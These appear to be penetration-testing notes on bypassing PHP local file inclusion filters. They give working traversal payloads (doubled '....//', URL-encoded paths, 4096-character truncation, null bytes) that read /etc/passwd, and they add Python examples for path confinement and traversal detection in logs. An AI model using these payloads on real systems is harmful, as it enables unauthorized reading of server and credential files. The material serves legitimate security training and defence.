#non-recursive path traversal filters
$language = str_replace('../', '', $_GET['language']);
* this "search and replace" filter is the most basic filter against LFI
- it is supposed to remove every occurrence of the ../ substring
- it is easily bypassed because it is not recursive: the replacement runs once and the resulting string is not filtered again, so a payload that only forms ../ after one removal survives
- bypasses include: ....// ..././ ....\/ or ....////
#approved paths
if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
    include($_GET['language']);
} else {
    echo 'Illegal path specified!'; // <---------- indicator
}
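Both filters above fail for the same reason: they sanitise or pattern-match the raw string instead of checking where the path actually ends up. The following Python is an added example (not code from the original page) that mirrors the two PHP filters and sets a canonicalisation check beside them. `BASE_DIR`, the `.php` extension and all function names are assumptions chosen for the example; in production the same check would be done with `realpath()` so that symlinks are resolved as well.

```python
import posixpath
import re

# assumed directory that the language files live in (example value)
BASE_DIR = "/var/www/html/languages"


def naive_strip_filter(user_input):
    """Mirror of str_replace('../', '', $_GET['language']): one non-recursive pass."""
    return user_input.replace("../", "")


def recursive_strip_filter(user_input):
    """Keep removing '../' until the string stops changing.
    Closes the ....// hole but is still a blacklist; see resolve_under_base()."""
    previous = None
    current = user_input
    while previous != current:
        previous, current = current, current.replace("../", "")
    return current


def naive_prefix_filter(user_input):
    """Mirror of preg_match('/^\\.\\/languages\\/.+$/', ...): checks only the prefix,
    so a string that starts with ./languages/ but climbs out again still passes."""
    return re.match(r"^\./languages/.+$", user_input) is not None


def resolve_under_base(user_input, base_dir=BASE_DIR, ext=".php"):
    """Hardened check: build the final path (extension included), normalise it
    lexically and accept it only if it is still inside base_dir.
    Returns the resolved path or None when the request escapes base_dir.
    A path that is confined but does not exist simply makes include() fail."""
    # NUL bytes have no place in a file name; reject instead of truncating
    if "\x00" in user_input:
        return None
    # posixpath.join discards base_dir when user_input is absolute, which the
    # prefix check below then catches
    candidate = posixpath.normpath(posixpath.join(base_dir, user_input + ext))
    if candidate != base_dir and not candidate.startswith(base_dir + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for payload in ("en", "....//....//etc/passwd", "../../../../etc/passwd"):
        print(repr(payload),
              "naive:", naive_strip_filter(payload),
              "| confined:", resolve_under_base(payload))
```

Run it and the first filter turns `....//....//etc/passwd` into `../../etc/passwd`, while the canonical check returns `None` for anything that leaves `BASE_DIR`, whether the traversal is doubled, absolute, padded to thousands of characters, or carries a NUL byte.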
BYPASS: VIA NON-RECURSIVE PATH TRAVERSAL FILTER
this method is used when the target has a filter in place that removes "../" from user input
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=../../../../etc/passwd
* if an error is displayed or nothing seems to work, the back-end configuration may have a path traversal filter in place, such as
$language = str_replace('../', '', $_GET['language']);
- in cases like this the filter may be bypassed by doubling the ../ sequence, e.g. ....//
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=....//....//....//....//etc/passwd
root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
...
BYPASS: VIA URL ENCODING
this method is used when the target has filters in place that disallow the "." or "/" characters in user input
root@oco:~$ burpsuite
BURP > Decoder
input: ../../../etc/passwd
encode as: URL
output: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
* the vulnerable application URL-decodes the payload before using it, so the filter sees only the encoded form
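From the defender's side, the encoded and doubled forms shown on this page are exactly what a log filter has to normalise before matching. The following Python is an added example (not from the original page): it URL-decodes each request target until the string stops changing, then looks for the indicators this page describes (dot-dot-slash, doubled-dot sequences, NUL bytes, oversized paths). The log lines are constructed for the example and are not real traffic; the thresholds and reason labels are assumptions.

```python
import re
from urllib.parse import unquote

# constructed sample lines in Apache common-log style (not real traffic)
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=es HTTP/1.1" 200 1043
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?language=....//....//....//....//etc/passwd HTTP/1.1" 200 2143
10.0.0.7 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 HTTP/1.1" 200 2143
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?language=languages/....//....//etc/passwd HTTP/1.1" 200 2143
10.0.0.9 - - [10/Oct/2023:13:56:09 +0000] "GET /index.php?language=/etc/passwd%00 HTTP/1.1" 200 2143
"""

# request target between the method and the HTTP version
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/')


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so that layered encoding cannot hide '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_indicators(target):
    """Return the list of reasons a request target looks like a traversal attempt."""
    reasons = []
    decoded = fully_decode(target)
    if "../" in decoded and "../" not in target:
        reasons.append("encoded traversal")        # ../ only visible after decoding
    if re.search(r"\.{3,}[/\\]", decoded):
        reasons.append("doubled-dot sequence")     # ....// style, aimed at one-pass filters
    if re.search(r"\.\.[/\\]", decoded):
        reasons.append("dot-dot-slash")
    if "\x00" in decoded:
        reasons.append("null byte")                # extension-truncation trick
    if len(target) >= 4096:
        reasons.append("oversized path")           # path-truncation trick (assumed threshold)
    return reasons


def scan_log(text):
    """Map 1-based line numbers to the indicators found on that line."""
    hits = {}
    for number, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = traversal_indicators(match.group("target"))
        if reasons:
            hits[number] = reasons
    return hits


if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(reasons)}")
```

The decode-before-match step is the one that matters: matching `../` against the raw request text misses the third line entirely, and matching only after a single `unquote()` would miss any further layer of encoding.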
BYPASS: VIA APPROVED PATHS
this method is used when the webapp uses a regular expression to ensure that the file being included is under a specific path (e.g., ./languages)
it is also used when the web application applies multiple filters, such as "approved paths", "disallowed file inclusion characters" and "path traversal filters". the filters may be bypassed by combining the basic bypass techniques: start with the approved path, then apply URL encoding or the non-recursive-filter payload
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/....//....//....//....//etc/passwd
* this technique combines the approved path with the non-recursive filter bypass
- the approved path combined with URL encoding of the characters could also have been used
BYPASS: APPENDED EXTENSION
some webapps append an extension to the input string to ensure that the file being included has the expected extension (e.g., .php).
VIA PATH TRUNCATION
this only works with PHP versions before 5.3/5.4. for the technique to work, the path must start with a non-existing directory and the payload must be 4096 characters long in total, so that only the .php extension gets truncated and not the requested file at the end of the string (e.g., /etc/passwd)
root@oco:~$ echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
VIA NULL BYTES
PHP versions before 5.5 are vulnerable to null byte injection: adding a null byte (%00) at the end of the string terminates it, and anything after it is ignored. this works because of how strings are stored in low-level memory, where a null byte marks the end of the string, as in Assembly, C or C++.
root@oco:~$ BROWSER > {targetSite:port}/index.php/etc/passwd%00.php
* anything after the null byte (%00) is truncated, so the path actually used is /etc/passwd, bypassing the appended extension.